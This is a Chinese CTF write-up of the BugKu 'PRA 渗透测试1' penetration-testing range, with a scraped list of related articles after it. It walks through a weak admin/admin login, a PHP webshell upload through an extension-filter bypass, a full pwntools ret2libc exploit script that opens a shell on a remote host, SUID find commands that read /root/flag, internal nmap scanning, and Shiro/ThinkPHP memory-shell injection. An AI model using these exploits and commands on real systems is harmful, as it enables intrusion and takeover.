写在前面

这个靶场之前走的时候确实没搞下来，里面涉及到pwn的知识，我是完全不会，所以也是参考了大佬的文章，后面会附上大佬博客的链接。

信息搜集一波

这里先信息搜集一波，先扫下目录和端口。

场景1

场景1还是很简单的，直接查看源代码，拉到最下面就能看到第一个flag

场景2

根据上一个flag的提示，应该是需要找到网站后台然后登陆进去，在通过之前扫过目录，判断后台为/admin

使用弱口令admin admin直接登录，这里其实就是随手试了一下，如果没试出来，也是可以爆破的。
在网站配置中的基本设置里，找到第二个flag

场景3

通过翻找网站，在内容管理 -> 模型管理中选择添加模型，找到一个上传点，尝试上传php

发现说上传的后缀为空了，那这里就是把我们的php后缀改为了空，我们尝试双写绕过

提示我们不能上传，经过各种翻找，发现网站在网站设置 -> 基本设置里是可以更改上传后缀的

添加php后缀

再次上传，上传成功，并返回了上传路径，这里有个点很奇怪，就是使用pphphp就能绕后，phphpp就不行。

上传后，成功拿到webshell

根据上一题的提示 /home，在/home/ctf/下查看第三个flag

场景4

根据上一题的提示，和数据库有关，找到数据库文件

通过webshell工具直接连接上数据库，得到第四个flag

场景5

这道题确实不大会，这里直接借用大佬的脚本，具体可以参考大佬的博客

from pwn import *from LibcSearcher import *context.log_level = 'debug'r = remote('47.122.10.163',9999)elf = ELF('./main')main_addr = elf.sym['main']
write_plt = elf.plt['write']
write_got = elf.got['write']print(write_got)ppp_ret = 0x08048559payload = b'A'*(0x24 + 4) + p32(write_plt) + p32(ppp_ret) + p32(1) + p32(write_got) + p32(8) + p32(main_addr)r.sendlineafter('plz input your name:\n',payload)write_addr = u32(r.recv(4))print(hex(write_addr))libc = LibcSearcher('write',write_addr)libc_base = write_addr - libc.dump('write')system_addr = libc_base + libc.dump('system')binsh_addr = libc_base + libc.dump('str_bin_sh')print(hex(system_addr),hex(binsh_addr))payload = b'A'*40 +p32(system_addr) + b'a'*4 + p32(binsh_addr)r.sendlineafter('plz input your name:\n',payload)r.interactive()

运行脚本后选择 3 ，获取root权限

在root目录下得到flag

场景6

给出提示8080，咱们之前扫描端口也扫到了8080，尝试访问

扫描网站目录

访问robots.txt文件，得到flag

场景7

在登录界面输入密码进行尝试

发现rememberMe=deleteMe特征，该特征是shiro框架，直接利用工具

利用工具注入内存马

连接内存马成功

在home目录下，得到flag

场景8

到了这里也没什么提示，大概率应该就是提权了，那么首先就先试试suid提权

find / -perm -4000 -type f 2>/dev/null

发现有find，直接利用find提权，这里直接利用已有的flag文件进行提权

find flag -exec whoami \;

查看root目录下的flag

find flag -exec cat /root/flag \;

场景9

提示看看内网，那咱们就回到刚才的webshell上，看看内网都有哪些地址存活，这里发现这台服务器上就有nmap，直接扫该网段就行，首先查看该网段

利用nmap扫描

nmap -sV -T 4 -o re.txt 192.168.0.0/24

这里我们直接选择0.4这个地址渗透，首先需要做内网穿透，这里用frp或者nps什么的都可以，操作都比较简单，这里就不赘述了，直接连接

这里还是常规的扫了下目录，没有什么有用的东西，尝试输入一个不存在的路径（这种方法一般就是用来判断tp的），发现确实是thinkphp框架

直接上工具

这里有一个数据库的信息泄露，需要记一下，直接注入内存马

在上一级目录得到flag

场景10

根据上面的提示，是数据库，刚刚是有数据库信息的，这里有个技巧的，刚刚用工具getshell之后，用的是蚁剑连接，但是他不能直接连数据库，所以我用蚁剑上传一个哥斯拉的马，然后用哥斯拉再连接

场景11

最后一道题提示权限貌似不够，所以还是提权，这里用到的是CVE-2021-3156，内核提权，这里我使用的非交互的poc，链接，直接上传，输入make编译后，查看root目录下的flag

BugKu -- PRA -- 渗透测试1相关推荐

渗透测试常用在线工具汇总
网站导航编码/加密 CyberChef:编解码及加密,可本地部署 https://github.com/gchq/CyberChef OK Tools在线工具:https://github.com/ ...
渗透测试-最全Web 渗透测试信息搜集-CheckList
干货 | 最全Web 渗透测试信息搜集-CheckList 文章目录干货 | 最全Web 渗透测试信息搜集-CheckList 前言 1.获取真实IP 2.如何判断是否是CDN 使用ping域名判断 ...
记一次初级渗透测试模拟过程
0x00 前言网络安全攻防赛是一种国际流行的竞技模式,自2014年在国内升温,发展到现在,深受各大高校和安全企业的青睐.参赛者在竞技过程中能够更大的限度的收获专业知识.激发潜能.为了让更多人切身体会 ...
干货丨渗透测试常用方法总结，大神之笔！
干货丨渗透测试常用方法总结,大神之笔! 一.渗透流程信息收集漏洞验证/漏洞攻击提权,权限维持日志清理信息收集一般先运行端口扫描和漏洞扫描获取可以利用的漏洞.多利用搜索引擎端口扫描有授权 ...
看完这篇教你玩转渗透测试靶机Vulnhub——DriftingBlues-1
Vulnhub靶机DriftingBlues-1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机漏洞详解: ①:信息收集: ②:目录爆破: ③:暴力破解: ④:提权 ...
查询Master下的系统表和系统视图获取数据库的信息和简单的渗透测试
在SQL中可以通过查询Master下的系统表(sys)和系统视图(information_schema)获取数据库的信息.SQL2000和SQL2005的结构略有不同. 系统表结构参考系统表详细说明. ...
渗透测试:正义黑客的渗透测试以及该过程和黑客活动的区别
2019独角兽企业重金招聘Python工程师标准>>> 渗透测试是正义黑客大展身手的地方.他们可以对漏洞评估中识别出的许多漏洞进行测试,以量化该漏洞带来的实际威胁和风险. 当正义黑客 ...
渗透测试是否需要学习Linux
渗透测试是一种利用模拟黑客攻击的手段,来评估生产系统的安全性能,用黑客惯用的破坏攻击方式,行的却是维护安全之事,也就是大家所说的白帽黑客.白帽黑客通常受雇于各大公司,是维护网络与计算机安全的主要力量. ...
暗渡陈仓：用低消耗设备进行破解和渗透测试1.2.2　渗透测试工具集
1.2.2 渗透测试工具集 Deck包含大量的渗透测试工具.设计理念是每个可能会用到的工具都应该包含进来,以确保在使用时无须下载额外的软件包.在渗透测试行动中给攻击机安装新的软件包很困难,轻则要费很大 ...

BugKu -- PRA -- 渗透测试1

写在前面

信息搜集一波

场景1

场景2

场景3

场景4

场景5

场景6

场景7

场景8

场景9

场景10

场景11

BugKu -- PRA -- 渗透测试1相关推荐

最新文章

热门文章